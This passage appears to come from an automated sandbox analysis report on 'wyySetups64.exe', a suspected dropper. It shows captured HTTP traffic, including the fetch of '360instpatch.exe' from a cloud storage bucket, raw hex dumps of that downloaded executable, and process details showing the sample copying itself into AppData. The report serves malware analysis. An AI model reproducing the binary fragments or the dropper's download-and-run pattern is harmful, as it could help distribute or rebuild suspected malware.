                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293493032 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.296830893 CET235OUTGET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846714020 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.848267078 CET398OUTGET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.397253036 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.027101994 CET398OUTGET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.577312946 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449740180.163.251.230804460C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.158313036 CET384OUTGET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.697072983 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.007144928 CET384OUTGET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.536041021 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.026551962 CET385OUTGET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.553643942 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.554636002 CET239OUTGET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.081820965 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:16:11 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac6bb-0"
                                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.44974739.156.85.231804460C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.406244993 CET202OUTGET /360safe/h_inst.cab?rd=36608336 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                                                            Host: pinst.360.cn
                                                                                                                                                                                                            Connection: Close
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001564026 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:16 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 648
                                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 02:49:36 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001821995 CET648INData Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51
                                                                                                                                                                                                            Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449735149.129.12.344436992C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-12-29 08:02:00 UTC138OUTGET /360instpatch.exe HTTP/1.1
                                                                                                                                                                                                            User-Agent: URLDownloader
                                                                                                                                                                                                            Host: gwwifha84989.oss-ap-northeast-2.aliyuncs.com
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC562INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: AliyunOSS
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:00 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 4118496
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-oss-request-id: 677101F809267733339AA161
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            ETag: "AAA0F14BDFE3777EEE342C27DE409E6D"
                                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 15:44:55 GMT
                                                                                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                                                                                            x-oss-hash-crc64ecma: 13828654626470641508
                                                                                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                                                                                            x-oss-ec: 0048-00000113
                                                                                                                                                                                                            Content-Disposition: attachment
                                                                                                                                                                                                            x-oss-force-download: true
                                                                                                                                                                                                            Content-MD5: qqDxS9/jd37uNCwn3kCebQ==
                                                                                                                                                                                                            x-oss-server-time: 2
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 c5 b9 d1 65 a4 d7 82 65 a4 d7 82 65 a4 d7 82 d8 eb 41 82 61 a4 d7 82 6c dc 42 82 79 a4 d7 82 42 62 b9 82 64 a4 d7 82 6c dc 5e 82 73 a4 d7 82 7b f6 53 82 61 a4 d7 82 42 62 ba 82 66 a4 d7 82 42 62 ac 82 40 a4 d7 82 65 a4 d6 82 b7 a5 d7 82 6c dc 54 82 d2 a4 d7 82 6c dc 53 82 ca a4 d7 82 7b f6 43 82 64 a4 d7 82 6c dc 46 82 64 a4 d7 82 52 69 63 68 65 a4 d7 82 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!eeeAalByBbdl^s{SaBbfBb@elTlS{CdlFdRiche
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 75 08 c7 44 24 10 fe ff 00 00 0f b7 74 24 10 8d 34 b6 03 f6 03 f6 03 f6 8b c6 e8 23 f3 ff ff 89 44 24 18 85 c0 75 19 68 68 cc 4c 00 50 50 ba 68 cc 4c 00 e8 4a 37 00 00 83 c4 0c e9 62 01 00 00 85 f6 74 24 8b 4c 24 34 8b 54 24 30 56 50 51 52 8d 7c 24 48 e8 e9 f9 ff ff 83 c4 10 85 c0 0f 84 3e 01 00 00 8b 44 24 18 01 b5 b0 00 00 00 83 7c 24 14 00 8b 74 24 10 74 2b 33 ff 33 d2 8b c8 66 3b fe 73 20 81 39 49 4e 49 54 75 06 80 79 04 00 74 0b 42 83 c1 28 66 3b d6 72 e9 eb 07 c6 85 9e 00 00 00 01 8b 4c 24 24 8b 54 24 20 51 e8 d0 01 00 00 8b f0 83 c4 04 89 74 24 20 85 f6 0f 84 c3 00 00 00 6a 0a 56 8d 44 24 40 e8 03 01 00 00 83 c4 08 85 c0 0f 84 ac 00 00 00 8b 40 04 85 c0 0f 89 a1 00 00 00 25 ff ff ff 7f 03 c6 68 60 03 00 00 50 8d 44 24 40 e8 d7 00 00 00 83 c4 08 85
                                                                                                                                                                                                            Data Ascii: uD$t$4#D$uhhLPPhLJ7bt$L$4T$0VPQR|$H>D$|$t$t+33f;s 9INITuytB(f;rL$$T$ Qt$ jVD$@@%h`PD$@
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 73 4b 85 db 74 47 b9 20 00 00 00 2b cf 89 4c 24 0c 8b 4c 24 14 2b ce 55 8d 14 9e 89 4c 24 0c eb 05 90 8b 4c 24 0c 8b 74 11 fc 83 ea 04 8b ee 8b cf d3 ed 4b 0b e8 89 2a 85 ff 74 0a 8b 4c 24 10 d3 e6 8b c6 eb 02 33 c0 85 db 75 d6 5d 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 38 06 00 00 55 8b ac 24 4c 06 00 00 57 8b f8 8b 84 24 54 06 00 00 85 c0 0f 84 d4 02 00 00 48 83 3c 87 00 75 07 8b c8 48 85 c9 75 f3 53 8d 58 01 89 5c 24 14 85 db 0f 84 b5 02 00 00 8b 4c 9f fc 33 c0 85 c9 74 08 40 d1 e9 83 f8 20 72 f4 56 be 20 00 00 00 2b f0 89 74 24 2c 8b cb 8d 84 24 3c 02 00 00 eb 09 8d a4 24 00 00 00 00 8b ff c7 00 00 00 00 00 83 c0 04 83 e9 01 75 f2 8b 84 24 54 06 00 00 55 8d 8c 24 40 02 00 00 e8 ae fe ff ff 89 84 ac 40 02 00 00 53 8b c7 8d
                                                                                                                                                                                                            Data Ascii: sKtG +L$L$+UL$L$tK*tL$3u]^[8U$LW$TH<uHuSX\$L3t@ rV +t$,$<$u$TU$@@S
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 00 8d 55 d8 52 c7 45 d8 50 20 4c 00 e8 77 7c 07 00 8b 45 08 8b 4d ec 89 45 e4 40 89 65 f0 50 c6 45 fc 02 e8 5a 03 00 00 89 45 08 b8 ff c9 40 00 c3 8b 7d ec 8b 75 e4 8b 5d 0c 85 db 76 20 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 8b 4d 08 53 50 8d 46 01 50 51 e8 a1 7b 07 00 83 c4 10 83 7f 18 10 72 0c 8b 57 04 52 e8 03 7b 07 00 83 c4 04 8b 4d 08 8d 47 04 c6 00 00 89 08 89 77 18 89 5f 14 83 fe 10 72 02 8b c1 c6 04 18 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 75 ec 83 7e 18 10 72 0c 8b 46 04 50 e8 be 7a 07 00 83 c4 04 6a 00 c7 46 18 0f 00 00 00 c7 46 14 00 00 00 00 6a 00 c6 46 04 00 e8 b8 7b 07 00 cc cc 56 57 8b 7c 24 0c 85 ff 74 2c 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 3b fa 72 17 83 fe 10 72 02 8b 00 8b 49 14 03 c8 3b cf
                                                                                                                                                                                                            Data Ascii: UREP Lw|EME@ePEZE@}u]v rGGMSPFPQ{rWR{MGw_rMdY_^[]u~rFPzjFFjF{VW|$t,qAr;rrI;
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 74 24 2c e8 ba 00 00 00 8d 44 24 0c e8 81 04 00 00 eb 3e 53 8d 4c 24 10 e8 35 f8 ff ff 83 c4 04 8d 74 24 2c e8 99 00 00 00 c7 44 24 48 ff ff ff ff 8b 44 24 0c 83 c0 f0 83 ca ff 8d 48 0c f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 b8 01 00 00 00 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 06 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 04 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 08 8b c6 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 46 08 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 46 04 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff
                                                                                                                                                                                                            Data Ascii: t$,D$>SL$5t$,D$HD$HJPBL$@dY_^]NPNNPNFNPNFFHJPBFHJPB
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 9c 24 74 04 00 00 68 02 00 00 80 89 5c 24 34 ff 15 40 e0 4b 00 3b c3 0f 85 bc 00 00 00 8b 7c 24 20 33 c0 89 7c 24 34 89 5c 24 38 89 44 24 2c 8d 49 00 8d 54 24 3c 52 53 53 53 8d 4c 24 2c 51 8d 94 24 60 02 00 00 52 50 be 04 01 00 00 57 89 74 24 3c ff 15 28 e0 4b 00 85 c0 0f 85 44 01 00 00 89 5c 24 14 89 5c 24 18 8d 44 24 28 50 6a 01 53 8d 8c 24 58 02 00 00 51 c6 84 24 74 04 00 00 01 57 89 5c 24 3c ff 15 40 e0 4b 00 3b c3 75 51 8b 6c 24 28 68 88 e6 4c 00 8d 54 24 18 89 74 24 20 52 8d 7c 24 24 8d 74 24 4c 89 6c 24 1c 89 5c 24 20 e8 6c db ff ff 85 c0 74 36 88 9c 24 64 04 00 00 3b eb 74 0b 55 ff 15 3c e0 4b 00 89 5c 24 14 89 5c 24 18 e9 b3 00 00 00 33 c0 e9 ef 00 00 00 88 9c 24 64 04 00 00 89 5c 24 18 e9 9c 00 00 00 8d 44 24 44 50 e8 87 64 07 00 83 c4 04 83 f8
                                                                                                                                                                                                            Data Ascii: $th\$4@K;|$ 3|$4\$8D$,IT$<RSSSL$,Q$`RPWt$<(KD\$\$D$(PjS$XQ$tW\$<@K;uQl$(hLT$t$ R|$$t$Ll$\$ lt6$d;tU<K\$\$3$d\$D$DPd
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: ff 74 24 14 ff 31 ff 15 44 e0 4b 00 c2 08 00 55 8b ec 83 7d 0c 00 56 8b f1 75 05 6a 0d 58 eb 21 ff 75 0c ff 15 78 e3 4b 00 8d 44 00 02 50 ff 75 0c ff 75 10 6a 00 ff 75 08 ff 36 ff 15 44 e0 4b 00 5e 5d c2 0c 00 53 56 8b 74 24 10 8b d9 85 f6 75 05 6a 0d 58 eb 2d 57 33 ff 56 ff 15 78 e3 4b 00 40 8d 0c 00 03 f1 03 f9 83 f8 01 75 ec 57 ff 74 24 18 6a 07 6a 00 ff 74 24 20 ff 33 ff 15 44 e0 4b 00 5f 5e 5b c2 08 00 ff 74 24 08 ff 74 24 08 ff 15 68 e3 4b 00 f7 d8 1a c0 fe c0 c3 b8 09 00 02 80 c2 04 00 8b 01 6a 27 59 66 3b 08 75 13 50 ff 15 64 e5 4b 00 6a 27 59 66 3b 08 74 04 33 c0 40 c3 33 c0 c3 8b 44 24 04 83 f8 64 56 8b f1 7d 05 b8 e8 03 00 00 83 26 00 6a 02 50 89 46 04 e8 88 fc ff ff 59 59 89 46 08 85 c0 74 05 33 c9 66 89 08 8b c6 5e c2 04 00 ff 71 08 ff 15 74
                                                                                                                                                                                                            Data Ascii: t$1DKU}VujX!uxKDPuuju6DK^]SVt$ujX-W3VxK@uWt$jjt$ 3DK_^[t$t$hKj'Yf;uPdKj'Yf;t3@3D$dV}&jPFYYFt3f^qt
                                                                                                                                                                                                            2024-12-29 08:02:01 UTC16384INData Raw: 56 8b f1 8b 0e 85 c9 74 08 e8 dc fd ff ff 83 26 00 5e c3 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b8 15 ff ff ff 75 0c ff 75 08 e8 fb a1 06 00 59 59 8b f0 56 8b cf e8 f1 04 ff ff ff 75 0c 8d 4e 01 ff 75 08 51 50 e8 27 a4 06 00 83 c4 10 56 8b cf e8 06 05 ff ff 5f 5e 5d c2 08 00 56 8b f1 6a 00 6a 00 8d 4e 14 e8 70 ad ff ff 85 c0 75 0d 6a 0e ff 15 64 e3 4b 00 83 c8 ff eb 2d 56 83 c6 08 56 68 c0 cd 4e 00 e8 18 cc ff ff ff 74 24 0c 68 6b a9 41 00 ff 74 24 10 68 81 00 00 00 ff 35 34 cd 4e 00 ff 15 84 e5 4b 00 5e c2 08 00 e9 48 ff ff ff 6a 00 b8 e9 40 4b 00 e8 8f 89 06 00 8b 45 08 83 65 fc 00 85 c0 74 04 8b 00 eb 02 33 c0 8b 11 50 51 ff 52 0c 8b 4d 08 8b f0 85 c9 74 05 e8 00 fd ff ff 8b c6 e8 3a 8a 06 00 c2 04 00 6a 00 b8 0c 41 4b 00 e8 53 89 06
                                                                                                                                                                                                            Data Ascii: Vt&^U}VWuhWuuYYVuNuQP'V_^]VjjNpujdK-VVhNt$hkAt$h54NK^Hj@KEet3PQRMt:jAKS
                                                                                                                                                                                                            2024-12-29 08:02:02 UTC16384INData Raw: 44 0a 35 3e c7 85 a4 fd ff ff d5 cd b4 bc c7 85 a8 fd ff ff a8 ce ea 72 c7 85 ac fd ff ff bb 84 64 fa c7 85 b0 fd ff ff ae 12 66 8d c7 85 b4 fd ff ff 47 6f 3c bf c7 85 b8 fd ff ff 63 e4 9b d2 c7 85 bc fd ff ff 9e 5d 2f 54 c7 85 c0 fd ff ff 1b 77 c2 ae c7 85 c4 fd ff ff 70 63 4e f6 c7 85 c8 fd ff ff 8d 0d 0e 74 c7 85 cc fd ff ff 57 13 5b e7 c7 85 d0 fd ff ff 71 16 72 f8 c7 85 d4 fd ff ff 5d 7d 53 af c7 85 d8 fd ff ff 08 cb 40 40 c7 85 dc fd ff ff cc e2 b4 4e c7 85 e0 fd ff ff 6a 46 d2 34 c7 85 e4 fd ff ff 84 af 15 01 c7 85 e8 fd ff ff 28 04 b0 e1 c7 85 ec fd ff ff 1d 3a 98 95 c7 85 f0 fd ff ff b4 9f b8 06 c7 85 f4 fd ff ff 48 a0 6e ce c7 85 f8 fd ff ff 82 3b 3f 6f c7 85 fc fd ff ff 82 ab 20 35 c7 85 00 fe ff ff 4b 1d 1a 01 c7 85 04 fe ff ff f8 27 72 27 c7
                                                                                                                                                                                                            Data Ascii: D5>rdfGo<c]/TwpcNtW[qr]}S@@NjF4(:Hn;?o 5K'r'
                                                                                                                                                                                                            2024-12-29 08:02:02 UTC16384INData Raw: ff 39 be f0 10 00 00 0f 84 d4 01 00 00 8b 45 10 8d 4e 08 89 86 04 11 00 00 89 be f4 10 00 00 e8 98 cc ff ff 8d 9e cc 10 00 00 8b cb 89 5d f0 e8 bc 99 ff ff ff 75 0c 89 7e 4c 8d 7e 58 8b cf e8 15 92 ff ff 57 e8 bb 94 ff ff c7 04 24 5c 11 4c 00 ff 37 e8 0d 02 06 00 f7 d8 59 1b c0 59 40 8d 4d d0 89 86 f8 10 00 00 e8 cc d3 ff ff 83 65 fc 00 8d 4d e8 e8 c0 d3 ff ff 8d 45 e8 50 8d 45 d0 50 ff 75 08 c6 45 fc 01 e8 c3 94 ff ff 83 c4 0c 8b cf e8 d7 90 ff ff 83 f8 03 0f 82 20 01 00 00 8d 4d d0 e8 c6 90 ff ff 83 f8 02 0f 82 0f 01 00 00 8d 4d e8 e8 b5 90 ff ff 83 f8 02 0f 82 fe 00 00 00 8d 7e 60 8b 07 33 c9 66 89 08 8d 4d d8 e8 48 d3 ff ff 8d 4d e0 c6 45 fc 02 e8 3c d3 ff ff bb a6 3d 42 00 eb 45 8b cf e8 80 90 ff ff 85 c0 74 71 57 8d 4d e8 e8 5e 91 ff ff ff 75 e0 e8
                                                                                                                                                                                                            Data Ascii: 9EN]u~L~XW$\L7YY@MeMEPEPuE MM~`3fMHME<=BEtqWM^u


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:03:01:54
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\wyySetups64.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5 hash:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:03:01:57
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\wyySetups64.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5 hash:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:2
